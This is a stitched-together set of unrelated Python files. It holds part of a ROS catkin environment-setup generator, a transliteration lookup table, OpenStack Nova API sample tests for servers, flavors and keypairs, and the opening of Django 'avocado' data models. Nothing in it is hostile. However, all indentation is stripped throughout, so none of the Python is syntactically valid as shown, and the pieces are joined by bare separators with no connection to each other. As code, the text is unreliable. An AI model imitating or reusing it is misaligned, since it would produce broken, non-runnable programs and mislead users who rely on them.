lines.insert(0, comment('reset environment variables by unrolling modifications based on all workspaces in CMAKE_PREFIX_PATH'))
return lines
def _rollback_env_variable(environ, name, subfolder):
'''
For each catkin workspace in CMAKE_PREFIX_PATH remove the first entry from env[NAME] matching workspace + subfolder.
:param subfolder: str '' or subfoldername that may start with '/'
:returns: the updated value of the environment variable.
'''
value = environ[name] if name in environ else ''
env_paths = [path for path in value.split(os.pathsep) if path]
value_modified = False
if subfolder:
if subfolder.startswith(os.path.sep) or (os.path.altsep and subfolder.startswith(os.path.altsep)):
subfolder = subfolder[1:]
if subfolder.endswith(os.path.sep) or (os.path.altsep and subfolder.endswith(os.path.altsep)):
subfolder = subfolder[:-1]
for ws_path in _get_workspaces(environ, include_fuerte=True, include_non_existing=True):
path_to_find = os.path.join(ws_path, subfolder) if subfolder else ws_path
path_to_remove = None
for env_path in env_paths:
env_path_clean = env_path[:-1] if env_path and env_path[-1] in [os.path.sep, os.path.altsep] else env_path
if env_path_clean == path_to_find:
path_to_remove = env_path
break
if path_to_remove:
env_paths.remove(path_to_remove)
value_modified = True
new_value = os.pathsep.join(env_paths)
return new_value if value_modified else None
def _get_workspaces(environ, include_fuerte=False, include_non_existing=False):
'''
Based on CMAKE_PREFIX_PATH return all catkin workspaces.
:param include_fuerte: The flag if paths starting with '/opt/ros/fuerte' should be considered workspaces, ``bool``
'''
# get all cmake prefix paths
env_name = 'CMAKE_PREFIX_PATH'
value = environ[env_name] if env_name in environ else ''
paths = [path for path in value.split(os.pathsep) if path]
# remove non-workspace paths
workspaces = [path for path in paths if os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE)) or (include_fuerte and path.startswith('/opt/ros/fuerte')) or (include_non_existing and not os.path.exists(path))]
return workspaces
def prepend_env_variables(environ, env_var_subfolders, workspaces):
'''
Generate shell code to prepend environment variables
for the all workspaces.
'''
lines = []
lines.append(comment('prepend folders of workspaces to environment variables'))
paths = [path for path in workspaces.split(os.pathsep) if path]
prefix = _prefix_env_variable(environ, 'CMAKE_PREFIX_PATH', paths, '')
lines.append(prepend(environ, 'CMAKE_PREFIX_PATH', prefix))
for key in sorted([key for key in env_var_subfolders.keys() if key != 'CMAKE_PREFIX_PATH']):
subfolder = env_var_subfolders[key]
prefix = _prefix_env_variable(environ, key, paths, subfolder)
lines.append(prepend(environ, key, prefix))
return lines
def _prefix_env_variable(environ, name, paths, subfolders):
'''
Return the prefix to prepend to the environment variable NAME, adding any path in NEW_PATHS_STR without creating duplicate or empty items.
'''
value = environ[name] if name in environ else ''
environ_paths = [path for path in value.split(os.pathsep) if path]
checked_paths = []
for path in paths:
if not isinstance(subfolders, list):
subfolders = [subfolders]
for subfolder in subfolders:
path_tmp = path
if subfolder:
path_tmp = os.path.join(path_tmp, subfolder)
# exclude any path already in env and any path we already added
if path_tmp not in environ_paths and path_tmp not in checked_paths:
checked_paths.append(path_tmp)
prefix_str = os.pathsep.join(checked_paths)
if prefix_str != '' and environ_paths:
prefix_str += os.pathsep
return prefix_str
def assignment(key, value):
if not IS_WINDOWS:
return 'export %s="%s"' % (key, value)
else:
return 'set %s=%s' % (key, value)
def comment(msg):
if not IS_WINDOWS:
return '# %s' % msg
else:
return 'REM %s' % msg
def prepend(environ, key, prefix):
if key not in environ or not environ[key]:
return assignment(key, prefix)
if not IS_WINDOWS:
return 'export %s="%s$%s"' % (key, prefix, key)
else:
return 'set %s=%s%%%s%%' % (key, prefix, key)
def find_env_hooks(environ, cmake_prefix_path):
'''
Generate shell code with found environment hooks
for the all workspaces.
'''
lines = []
lines.append(comment('found environment hooks in workspaces'))
generic_env_hooks = []
generic_env_hooks_workspace = []
specific_env_hooks = []
specific_env_hooks_workspace = []
generic_env_hooks_by_filename = {}
specific_env_hooks_by_filename = {}
generic_env_hook_ext = 'bat' if IS_WINDOWS else 'sh'
specific_env_hook_ext = environ['CATKIN_SHELL'] if not IS_WINDOWS and 'CATKIN_SHELL' in environ and environ['CATKIN_SHELL'] else None
# remove non-workspace paths
workspaces = [path for path in cmake_prefix_path.split(os.pathsep) if path and os.path.isfile(os.path.join(path, CATKIN_MARKER_FILE))]
for workspace in reversed(workspaces):
env_hook_dir = os.path.join(workspace, 'etc', 'catkin', 'profile.d')
if os.path.isdir(env_hook_dir):
for filename in sorted(os.listdir(env_hook_dir)):
if filename.endswith('.%s' % generic_env_hook_ext):
# remove previous env hook with same name if present
if filename in generic_env_hooks_by_filename:
i = generic_env_hooks.index(generic_env_hooks_by_filename[filename])
generic_env_hooks.pop(i)
generic_env_hooks_workspace.pop(i)
# append env hook
generic_env_hooks.append(os.path.join(env_hook_dir, filename))
generic_env_hooks_workspace.append(workspace)
generic_env_hooks_by_filename[filename] = generic_env_hooks[-1]
elif specific_env_hook_ext is not None and filename.endswith('.%s' % specific_env_hook_ext):
# remove previous env hook with same name if present
if filename in specific_env_hooks_by_filename:
i = specific_env_hooks.index(specific_env_hooks_by_filename[filename])
specific_env_hooks.pop(i)
specific_env_hooks_workspace.pop(i)
# append env hook
specific_env_hooks.append(os.path.join(env_hook_dir, filename))
specific_env_hooks_workspace.append(workspace)
specific_env_hooks_by_filename[filename] = specific_env_hooks[-1]
env_hooks = generic_env_hooks + specific_env_hooks
env_hooks_workspace = generic_env_hooks_workspace + specific_env_hooks_workspace
count = len(env_hooks)
lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_COUNT', count))
for i in range(count):
lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d' % i, env_hooks[i]))
lines.append(assignment('_CATKIN_ENVIRONMENT_HOOKS_%d_WORKSPACE' % i, env_hooks_workspace[i]))
return lines
def _parse_arguments(args=None):
parser = argparse.ArgumentParser(description='Generates code blocks for the setup.SHELL script.')
parser.add_argument('--extend', action='store_true', help='Skip unsetting previous environment variables to extend context')
return parser.parse_known_args(args=args)[0]
if __name__ == '__main__':
try:
try:
args = _parse_arguments()
except Exception as e:
print(e, file=sys.stderr)
sys.exit(1)
# environment at generation time
CMAKE_PREFIX_PATH = '/home/nicolas/objectorientation/devel;/home/gabriel/object-recogn/devel;/home/gabriel/catkin_ws/devel;/opt/ros/indigo'.split(';')
# prepend current workspace if not already part of CPP
base_path = os.path.dirname(__file__)
if base_path not in CMAKE_PREFIX_PATH:
CMAKE_PREFIX_PATH.insert(0, base_path)
CMAKE_PREFIX_PATH = os.pathsep.join(CMAKE_PREFIX_PATH)
environ = dict(os.environ)
lines = []
if not args.extend:
lines += rollback_env_variables(environ, ENV_VAR_SUBFOLDERS)
lines += prepend_env_variables(environ, ENV_VAR_SUBFOLDERS, CMAKE_PREFIX_PATH)
lines += find_env_hooks(environ, CMAKE_PREFIX_PATH)
print('\n'.join(lines))
# need to explicitly flush the output
sys.stdout.flush()
except IOError as e:
# and catch potantial "broken pipe" if stdout is not writable
# which can happen when piping the output to a file but the disk is full
if e.errno == errno.EPIPE:
print(e, file=sys.stderr)
sys.exit(2)
raise
sys.exit(0)
| |
data = (
'Mou ', # 0x00
'Ye ', # 0x01
'Wei ', # 0x02
'[?] ', # 0x03
'Teng ', # 0x04
'Zou ', # 0x05
'Shan ', # 0x06
'Jian ', # 0x07
'Bo ', # 0x08
'Ku ', # 0x09
'Huang ', # 0x0a
'Huo ', # 0x0b
'Ge ', # 0x0c
'Ying ', # 0x0d
'Mi ', # 0x0e
'Xiao ', # 0x0f
'Mi ', # 0x10
'Xi ', # 0x11
'Qiang ', # 0x12
'Chen ', # 0x13
'Nue ', # 0x14
'Ti ', # 0x15
'Su ', # 0x16
'Bang ', # 0x17
'Chi ', # 0x18
'Qian ', # 0x19
'Shi ', # 0x1a
'Jiang ', # 0x1b
'Yuan ', # 0x1c
'Xie ', # 0x1d
'Xue ', # 0x1e
'Tao ', # 0x1f
'Yao ', # 0x20
'Yao ', # 0x21
'[?] ', # 0x22
'Yu ', # 0x23
'Biao ', # 0x24
'Cong ', # 0x25
'Qing ', # 0x26
'Li ', # 0x27
'Mo ', # 0x28
'Mo ', # 0x29
'Shang ', # 0x2a
'Zhe ', # 0x2b
'Miu ', # 0x2c
'Jian ', # 0x2d
'Ze ', # 0x2e
'Jie ', # 0x2f
'Lian ', # 0x30
'Lou ', # 0x31
'Can ', # 0x32
'Ou ', # 0x33
'Guan ', # 0x34
'Xi ', # 0x35
'Zhuo ', # 0x36
'Ao ', # 0x37
'Ao ', # 0x38
'Jin ', # 0x39
'Zhe ', # 0x3a
'Yi ', # 0x3b
'Hu ', # 0x3c
'Jiang ', # 0x3d
'Man ', # 0x3e
'Chao ', # 0x3f
'Han ', # 0x40
'Hua ', # 0x41
'Chan ', # 0x42
'Xu ', # 0x43
'Zeng ', # 0x44
'Se ', # 0x45
'Xi ', # 0x46
'She ', # 0x47
'Dui ', # 0x48
'Zheng ', # 0x49
'Nao ', # 0x4a
'Lan ', # 0x4b
'E ', # 0x4c
'Ying ', # 0x4d
'Jue ', # 0x4e
'Ji ', # 0x4f
'Zun ', # 0x50
'Jiao ', # 0x51
'Bo ', # 0x52
'Hui ', # 0x53
'Zhuan ', # 0x54
'Mu ', # 0x55
'Zen ', # 0x56
'Zha ', # 0x57
'Shi ', # 0x58
'Qiao ', # 0x59
'Tan ', # 0x5a
'Zen ', # 0x5b
'Pu ', # 0x5c
'Sheng ', # 0x5d
'Xuan ', # 0x5e
'Zao ', # 0x5f
'Tan ', # 0x60
'Dang ', # 0x61
'Sui ', # 0x62
'Qian ', # 0x63
'Ji ', # 0x64
'Jiao ', # 0x65
'Jing ', # 0x66
'Lian ', # 0x67
'Nou ', # 0x68
'Yi ', # 0x69
'Ai ', # 0x6a
'Zhan ', # 0x6b
'Pi ', # 0x6c
'Hui ', # 0x6d
'Hua ', # 0x6e
'Yi ', # 0x6f
'Yi ', # 0x70
'Shan ', # 0x71
'Rang ', # 0x72
'Nou ', # 0x73
'Qian ', # 0x74
'Zhui ', # 0x75
'Ta ', # 0x76
'Hu ', # 0x77
'Zhou ', # 0x78
'Hao ', # 0x79
'Ye ', # 0x7a
'Ying ', # 0x7b
'Jian ', # 0x7c
'Yu ', # 0x7d
'Jian ', # 0x7e
'Hui ', # 0x7f
'Du ', # 0x80
'Zhe ', # 0x81
'Xuan ', # 0x82
'Zan ', # 0x83
'Lei ', # 0x84
'Shen ', # 0x85
'Wei ', # 0x86
'Chan ', # 0x87
'Li ', # 0x88
'Yi ', # 0x89
'Bian ', # 0x8a
'Zhe ', # 0x8b
'Yan ', # 0x8c
'E ', # 0x8d
'Chou ', # 0x8e
'Wei ', # 0x8f
'Chou ', # 0x90
'Yao ', # 0x91
'Chan ', # 0x92
'Rang ', # 0x93
'Yin ', # 0x94
'Lan ', # 0x95
'Chen ', # 0x96
'Huo ', # 0x97
'Zhe ', # 0x98
'Huan ', # 0x99
'Zan ', # 0x9a
'Yi ', # 0x9b
'Dang ', # 0x9c
'Zhan ', # 0x9d
'Yan ', # 0x9e
'Du ', # 0x9f
'Yan ', # 0xa0
'Ji ', # 0xa1
'Ding ', # 0xa2
'Fu ', # 0xa3
'Ren ', # 0xa4
'Ji ', # 0xa5
'Jie ', # 0xa6
'Hong ', # 0xa7
'Tao ', # 0xa8
'Rang ', # 0xa9
'Shan ', # 0xaa
'Qi ', # 0xab
'Tuo ', # 0xac
'Xun ', # 0xad
'Yi ', # 0xae
'Xun ', # 0xaf
'Ji ', # 0xb0
'Ren ', # 0xb1
'Jiang ', # 0xb2
'Hui ', # 0xb3
'Ou ', # 0xb4
'Ju ', # 0xb5
'Ya ', # 0xb6
'Ne ', # 0xb7
'Xu ', # 0xb8
'E ', # 0xb9
'Lun ', # 0xba
'Xiong ', # 0xbb
'Song ', # 0xbc
'Feng ', # 0xbd
'She ', # 0xbe
'Fang ', # 0xbf
'Jue ', # 0xc0
'Zheng ', # 0xc1
'Gu ', # 0xc2
'He ', # 0xc3
'Ping ', # 0xc4
'Zu ', # 0xc5
'Shi ', # 0xc6
'Xiong ', # 0xc7
'Zha ', # 0xc8
'Su ', # 0xc9
'Zhen ', # 0xca
'Di ', # 0xcb
'Zou ', # 0xcc
'Ci ', # 0xcd
'Qu ', # 0xce
'Zhao ', # 0xcf
'Bi ', # 0xd0
'Yi ', # 0xd1
'Yi ', # 0xd2
'Kuang ', # 0xd3
'Lei ', # 0xd4
'Shi ', # 0xd5
'Gua ', # 0xd6
'Shi ', # 0xd7
'Jie ', # 0xd8
'Hui ', # 0xd9
'Cheng ', # 0xda
'Zhu ', # 0xdb
'Shen ', # 0xdc
'Hua ', # 0xdd
'Dan ', # 0xde
'Gou ', # 0xdf
'Quan ', # 0xe0
'Gui ', # 0xe1
'Xun ', # 0xe2
'Yi ', # 0xe3
'Zheng ', # 0xe4
'Gai ', # 0xe5
'Xiang ', # 0xe6
'Cha ', # 0xe7
'Hun ', # 0xe8
'Xu ', # 0xe9
'Zhou ', # 0xea
'Jie ', # 0xeb
'Wu ', # 0xec
'Yu ', # 0xed
'Qiao ', # 0xee
'Wu ', # 0xef
'Gao ', # 0xf0
'You ', # 0xf1
'Hui ', # 0xf2
'Kuang ', # 0xf3
'Shuo ', # 0xf4
'Song ', # 0xf5
'Ai ', # 0xf6
'Qing ', # 0xf7
'Zhu ', # 0xf8
'Zou ', # 0xf9
'Nuo ', # 0xfa
'Du ', # 0xfb
'Zhuo ', # 0xfc
'Fei ', # 0xfd
'Ke ', # 0xfe
'Wei ', # 0xff
)
| |
# Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import os
import uuid as uuid_lib
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import importutils
import testtools
from nova.api.metadata import password
# Import extensions to pull in osapi_compute_extension CONF option used below.
from nova.console import manager as console_manager # noqa - only for cfg
from nova.network.neutronv2 import api as neutron_api # noqa - only for cfg
from nova import test
from nova.tests.functional import api_samples_test_base
from nova.tests.functional import integrated_helpers
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_network
from nova.tests.unit import fake_utils
from nova.tests.unit.image import fake
from nova.volume import cinder
CONF = cfg.CONF
CONF.import_opt('allow_resize_to_same_host', 'nova.compute.api')
CONF.import_opt('shelved_offload_time', 'nova.compute.manager')
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('osapi_compute_extension',
'nova.api.openstack.compute.extensions')
CONF.import_opt('osapi_compute_link_prefix', 'nova.api.openstack.common')
CONF.import_opt('osapi_glance_link_prefix', 'nova.api.openstack.common')
CONF.import_opt('enable', 'nova.cells.opts', group='cells')
CONF.import_opt('cell_type', 'nova.cells.opts', group='cells')
CONF.import_opt('db_check_interval', 'nova.cells.state', group='cells')
LOG = logging.getLogger(__name__)
class ApiSampleTestBaseV2(api_samples_test_base.ApiSampleTestBase):
_api_version = 'v2'
def setUp(self):
extends = []
self.flags(use_ipv6=False,
osapi_compute_link_prefix=self._get_host(),
osapi_glance_link_prefix=self._get_glance_host())
if not self.all_extensions:
if hasattr(self, 'extends_name'):
extends = [self.extends_name]
ext = [self.extension_name] if self.extension_name else []
self.flags(osapi_compute_extension=ext + extends)
super(ApiSampleTestBaseV2, self).setUp()
self.useFixture(test.SampleNetworks(host=self.network.host))
fake_network.stub_compute_with_ips(self.stubs)
fake_utils.stub_out_utils_spawn_n(self.stubs)
self.generate_samples = os.getenv('GENERATE_SAMPLES') is not None
class ApiSamplesTrap(ApiSampleTestBaseV2):
"""Make sure extensions don't get added without tests."""
all_extensions = True
def _get_extensions_tested(self):
tests = []
for attr in globals().values():
if not inspect.isclass(attr):
continue # Skip non-class objects
if not issubclass(attr, integrated_helpers._IntegratedTestBase):
continue # Skip non-test classes
if attr.extension_name is None:
continue # Skip base tests
cls = importutils.import_class(attr.extension_name)
tests.append(cls.alias)
return tests
def _get_extensions(self):
extensions = []
response = self._do_get('extensions')
for extension in jsonutils.loads(response.content)['extensions']:
extensions.append(str(extension['alias']))
return extensions
def test_all_extensions_have_samples(self):
# NOTE(danms): This is a list of extensions which are currently
# in the tree but that don't (yet) have tests. This list should
# NOT be allowed to grow, and should shrink to zero (and be
# removed) soon.
# TODO(gmann): skip this tests as merging of sample tests for v2
# and v2.1 are in progress. After merging all tests, this tests
# need to implement in different way.
raise testtools.TestCase.skipException('Merging of v2 and v2.1 '
'sample tests is in progress. '
'This test will be enabled '
'after all tests gets merged.')
do_not_approve_additions = []
do_not_approve_additions.append('os-create-server-ext')
do_not_approve_additions.append('os-baremetal-ext-status')
tests = self._get_extensions_tested()
extensions = self._get_extensions()
missing_tests = []
for extension in extensions:
# NOTE(danms): if you add tests, remove it from the
# exclusions list
self.assertFalse(extension in do_not_approve_additions and
extension in tests)
# NOTE(danms): if you add an extension, it must come with
# api_samples tests!
if (extension not in tests and
extension not in do_not_approve_additions):
missing_tests.append(extension)
if missing_tests:
LOG.error("Extensions are missing tests: %s" % missing_tests)
self.assertEqual(missing_tests, [])
class VersionsSampleJsonTest(ApiSampleTestBaseV2):
sample_dir = 'versions'
def test_versions_get(self):
response = self._do_get('', strip_version=True)
subs = self._get_regexes()
self._verify_response('versions-get-resp', subs, response, 200)
class ServersSampleBase(ApiSampleTestBaseV2):
def _post_server(self, use_common_server_api_samples=True):
# param use_common_server_api_samples: Boolean to set whether tests use
# common sample files for server post request and response.
# Default is True which means _get_sample_path method will fetch the
# common server sample files.
# Set False if tests need to use extension specific sample files
subs = {
'image_id': fake.get_valid_image_id(),
'host': self._get_host(),
}
orig_value = self.__class__._use_common_server_api_samples
try:
self.__class__._use_common_server_api_samples = (
use_common_server_api_samples)
response = self._do_post('servers', 'server-post-req', subs)
subs = self._get_regexes()
status = self._verify_response('server-post-resp', subs,
response, 202)
return status
finally:
self.__class__._use_common_server_api_samples = orig_value
class ServersSampleMultiStatusJsonTest(ServersSampleBase):
extension_name = '.'.join(('nova.api.openstack.compute.contrib',
'server_list_multi_status',
'Server_list_multi_status'))
def test_servers_list(self):
uuid = self._post_server()
response = self._do_get('servers?status=active&status=error')
subs = self._get_regexes()
subs['id'] = uuid
self._verify_response('servers-list-resp', subs, response, 200)
class FlavorsSampleJsonTest(ApiSampleTestBaseV2):
sample_dir = 'flavors'
def test_flavors_get(self):
response = self._do_get('flavors/1')
subs = self._get_regexes()
self._verify_response('flavor-get-resp', subs, response, 200)
def test_flavors_list(self):
response = self._do_get('flavors')
subs = self._get_regexes()
self._verify_response('flavors-list-resp', subs, response, 200)
class FlavorsSampleAllExtensionJsonTest(FlavorsSampleJsonTest):
all_extensions = True
class LimitsSampleJsonTest(ApiSampleTestBaseV2):
sample_dir = 'limits'
def test_limits_get(self):
response = self._do_get('limits')
subs = self._get_regexes()
self._verify_response('limit-get-resp', subs, response, 200)
class KeyPairsSampleJsonTest(ApiSampleTestBaseV2):
extension_name = "nova.api.openstack.compute.contrib.keypairs.Keypairs"
def generalize_subs(self, subs, vanilla_regexes):
subs['keypair_name'] = 'keypair-[0-9a-f-]+'
return subs
def test_keypairs_post(self, public_key=None):
"""Get api sample of key pairs post request."""
key_name = 'keypair-' + str(uuid_lib.uuid4())
response = self._do_post('os-keypairs', 'keypairs-post-req',
{'keypair_name': key_name})
subs = self._get_regexes()
subs['keypair_name'] = '(%s)' % key_name
self._verify_response('keypairs-post-resp', subs, response, 200)
# NOTE(maurosr): return the key_name is necessary cause the
# verification returns the label of the last compared information in
# the response, not necessarily the key name.
return key_name
def test_keypairs_import_key_post(self):
# Get api sample of key pairs post to import user's key.
key_name = 'keypair-' + str(uuid_lib.uuid4())
subs = {
'keypair_name': key_name,
'public_key': "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDx8nkQv/zgGg"
"B4rMYmIf+6A4l6Rr+o/6lHBQdW5aYd44bd8JttDCE/F/pNRr0l"
"RE+PiqSPO8nDPHw0010JeMH9gYgnnFlyY3/OcJ02RhIPyyxYpv"
"9FhY+2YiUkpwFOcLImyrxEsYXpD/0d3ac30bNH6Sw9JD9UZHYc"
"pSxsIbECHw== Generated-by-Nova"
}
response = self._do_post('os-keypairs', 'keypairs-import-post-req',
subs)
subs = self._get_regexes()
subs['keypair_name'] = '(%s)' % key_name
self._verify_response('keypairs-import-post-resp', subs, response, 200)
def test_keypairs_list(self):
# Get api sample of key pairs list request.
key_name = self.test_keypairs_post()
response = self._do_get('os-keypairs')
subs = self._get_regexes()
subs['keypair_name'] = '(%s)' % key_name
self._verify_response('keypairs-list-resp', subs, response, 200)
def test_keypairs_get(self):
# Get api sample of key pairs get request.
key_name = self.test_keypairs_post()
response = self._do_get('os-keypairs/%s' % key_name)
subs = self._get_regexes()
subs['keypair_name'] = '(%s)' % key_name
self._verify_response('keypairs-get-resp', subs, response, 200)
class VirtualInterfacesJsonTest(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib"
".virtual_interfaces.Virtual_interfaces")
def test_vifs_list(self):
uuid = self._post_server()
response = self._do_get('servers/%s/os-virtual-interfaces' % uuid)
subs = self._get_regexes()
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
self._verify_response('vifs-list-resp', subs, response, 200)
class UsedLimitsSamplesJsonTest(ApiSampleTestBaseV2):
extension_name = ("nova.api.openstack.compute.contrib.used_limits."
"Used_limits")
def test_get_used_limits(self):
# Get api sample to used limits.
response = self._do_get('limits')
subs = self._get_regexes()
self._verify_response('usedlimits-get-resp', subs, response, 200)
class UsedLimitsForAdminSamplesJsonTest(ApiSampleTestBaseV2):
ADMIN_API = True
extends_name = ("nova.api.openstack.compute.contrib.used_limits."
"Used_limits")
extension_name = (
"nova.api.openstack.compute.contrib.used_limits_for_admin."
"Used_limits_for_admin")
def test_get_used_limits_for_admin(self):
tenant_id = 'openstack'
response = self._do_get('limits?tenant_id=%s' % tenant_id)
subs = self._get_regexes()
return self._verify_response('usedlimitsforadmin-get-resp', subs,
response, 200)
class AvailabilityZoneJsonTest(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib.availability_zone."
"Availability_zone")
def test_create_availability_zone(self):
subs = {
'image_id': fake.get_valid_image_id(),
'host': self._get_host(),
"availability_zone": "nova"
}
response = self._do_post('servers', 'availability-zone-post-req', subs)
subs.update(self._get_regexes())
self._verify_response('availability-zone-post-resp', subs,
response, 202)
class ExtendedIpsSampleJsonTests(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib"
".extended_ips.Extended_ips")
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['hypervisor_hostname'] = r'[\w\.\-]+'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
uuid = self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['id'] = uuid
subs['hostid'] = '[a-f0-9]+'
self._verify_response('servers-detail-resp', subs, response, 200)
class ExtendedIpsMacSampleJsonTests(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib"
".extended_ips_mac.Extended_ips_mac")
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
self.assertEqual(response.status_code, 200)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
subs['id'] = uuid
subs['hypervisor_hostname'] = r'[\w\.\-]+'
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
uuid = self._post_server()
response = self._do_get('servers/detail')
self.assertEqual(response.status_code, 200)
subs = self._get_regexes()
subs['id'] = uuid
subs['hostid'] = '[a-f0-9]+'
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
self._verify_response('servers-detail-resp', subs, response, 200)
class ExtendedVIFNetSampleJsonTests(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib"
".extended_virtual_interfaces_net.Extended_virtual_interfaces_net")
def _get_flags(self):
f = super(ExtendedVIFNetSampleJsonTests, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
# extended_virtual_interfaces_net_update also
# needs virtual_interfaces to be loaded
f['osapi_compute_extension'].append(
('nova.api.openstack.compute.contrib'
'.virtual_interfaces.Virtual_interfaces'))
return f
def test_vifs_list(self):
uuid = self._post_server()
response = self._do_get('servers/%s/os-virtual-interfaces' % uuid)
self.assertEqual(response.status_code, 200)
subs = self._get_regexes()
subs['mac_addr'] = '(?:[a-f0-9]{2}:){5}[a-f0-9]{2}'
self._verify_response('vifs-list-resp', subs, response, 200)
class ServerPasswordSampleJsonTests(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib.server_password."
"Server_password")
def test_get_password(self):
# Mock password since there is no api to set it
def fake_ext_password(*args, **kwargs):
return ("xlozO3wLCBRWAa2yDjCCVx8vwNPypxnypmRYDa/zErlQ+EzPe1S/"
"Gz6nfmC52mOlOSCRuUOmG7kqqgejPof6M7bOezS387zjq4LSvvwp"
"28zUknzy4YzfFGhnHAdai3TxUJ26pfQCYrq8UTzmKF2Bq8ioSEtV"
"VzM0A96pDh8W2i7BOz6MdoiVyiev/I1K2LsuipfxSJR7Wdke4zNX"
"JjHHP2RfYsVbZ/k9ANu+Nz4iIH8/7Cacud/pphH7EjrY6a4RZNrj"
"QskrhKYed0YERpotyjYk1eDtRe72GrSiXteqCM4biaQ5w3ruS+Ac"
"X//PXk3uJ5kC7d67fPXaVz4WaQRYMg==")
self.stubs.Set(password, "extract_password", fake_ext_password)
uuid = self._post_server()
response = self._do_get('servers/%s/os-server-password' % uuid)
subs = self._get_regexes()
subs['encrypted_password'] = fake_ext_password().replace('+', '\\+')
self._verify_response('get-password-resp', subs, response, 200)
def test_reset_password(self):
uuid = self._post_server()
response = self._do_delete('servers/%s/os-server-password' % uuid)
self.assertEqual(response.status_code, 204)
class BlockDeviceMappingV2BootJsonTest(ServersSampleBase):
extension_name = ('nova.api.openstack.compute.contrib.'
'block_device_mapping_v2_boot.'
'Block_device_mapping_v2_boot')
def _get_flags(self):
f = super(BlockDeviceMappingV2BootJsonTest, self)._get_flags()
f['osapi_compute_extension'] = CONF.osapi_compute_extension[:]
# We need the volumes extension as well
f['osapi_compute_extension'].append(
'nova.api.openstack.compute.contrib.volumes.Volumes')
return f
def test_servers_post_with_bdm_v2(self):
self.stubs.Set(cinder.API, 'get', fakes.stub_volume_get)
self.stubs.Set(cinder.API, 'check_attach',
fakes.stub_volume_check_attach)
return self._post_server()
class ExtendedAvailabilityZoneJsonTests(ServersSampleBase):
extension_name = ("nova.api.openstack.compute.contrib"
".extended_availability_zone"
".Extended_availability_zone")
def test_show(self):
uuid = self._post_server()
response = self._do_get('servers/%s' % uuid)
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
self._verify_response('server-get-resp', subs, response, 200)
def test_detail(self):
self._post_server()
response = self._do_get('servers/detail')
subs = self._get_regexes()
subs['hostid'] = '[a-f0-9]+'
self._verify_response('servers-detail-resp', subs, response, 200)
class ServerGroupQuotas_LimitsSampleJsonTest(LimitsSampleJsonTest):
sample_dir = None
extension_name = ("nova.api.openstack.compute.contrib."
"server_group_quotas.Server_group_quotas")
class ServerGroupQuotas_UsedLimitsSamplesJsonTest(UsedLimitsSamplesJsonTest):
extension_name = ("nova.api.openstack.compute.contrib."
"server_group_quotas.Server_group_quotas")
extends_name = ("nova.api.openstack.compute.contrib.used_limits."
"Used_limits")
| |
import logging
import random
import jsonfield
from datetime import datetime
from django.db import models
from django.db.models import Count
from django.contrib.sites.models import Site
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.db.models import Q
from django.db.models.fields import FieldDoesNotExist
from django.db.models.signals import post_save, pre_delete
from django.core.exceptions import ValidationError
from avocado.core import utils
from avocado.core.structures import ChoicesDict
from avocado.core.models import Base, BasePlural, PublishArchiveMixin
from avocado.core.cache import post_save_cache, pre_delete_uncache, \
cached_method
from avocado.conf import settings
from avocado import managers, history
from avocado.query.translators import registry as translators
from avocado.query.operators import registry as operators
from avocado.query import oldparsers as parsers
from avocado.stats.agg import Aggregator
from avocado import formatters
__all__ = ('DataCategory', 'DataConcept', 'DataField',
'DataContext', 'DataView', 'DataQuery')
log = logging.getLogger(__name__)
class DataCategory(Base, PublishArchiveMixin):
"A high-level organization for data concepts."
# A reference to a parent for hierarchical categories
parent = models.ForeignKey('self', null=True, blank=True,
related_name='children',
limit_choices_to={'parent__isnull': True},
help_text='Sub-categories are limited to '
'one-level deep')
order = models.FloatField(null=True, blank=True, db_column='_order')
objects = managers.DataCategoryManager()
class Meta(object):
ordering = ('parent__order', 'parent__name', 'order', 'name')
verbose_name_plural = 'data categories'
class DataField(BasePlural, PublishArchiveMixin):
"""Describes the significance and/or meaning behind some data. In addition,
it defines the natural key of the Django field that represents the location
of that data e.g. ``library.book.title``.
"""
# App/model/field represent the natural key of this field based on
# Django's methods of distinguishing models.
app_name = models.CharField(max_length=200)
model_name = models.CharField(max_length=200)
field_name = models.CharField(max_length=200)
# Supplementary fields that respresent alternate representations
# of the base field
label_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Label field to the '
'reference field')
search_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Search field to the '
'reference field')
order_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Order field to the '
'reference field')
code_field_name = models.CharField(max_length=200, null=True, blank=True,
help_text='Order field to the '
'reference field')
